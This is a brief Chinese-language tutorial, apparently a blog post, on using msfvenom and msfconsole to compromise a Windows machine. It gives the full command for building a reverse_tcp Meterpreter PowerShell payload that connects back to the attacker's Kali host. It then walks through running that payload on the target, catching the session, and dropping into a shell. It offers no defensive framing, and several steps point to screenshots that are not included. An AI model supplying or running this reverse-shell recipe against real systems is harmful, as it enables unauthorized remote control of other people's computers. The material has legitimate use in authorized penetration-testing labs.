一、使用工具kali linux,windows severe msfvenom msfconsole
二、使用msfvenom生成ps1格式的Powershell脚本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本机IP) LPORT=XXXX(自己随便设置) -f psh-reflection >xxx.ps1
将生成的Powershell脚本下载并上传至windows机器中
三、启动Msfconsole
选择模块
设置payload
设置完成后执行run
在windows机器中执行powershell脚本,此时攻击机器中会显示如果下结果
如果攻击主机中显示通道已经建立但是未拿到相应的shell 如图:
回车进入:
msf exploit(handler)>
输入:sessions -l 查看信息
输入 seeions 1 就会拿到想要的meterpreter
在meterpreter中输入shell 即可拿到相应的shell
后续可以操作 一些相关命令。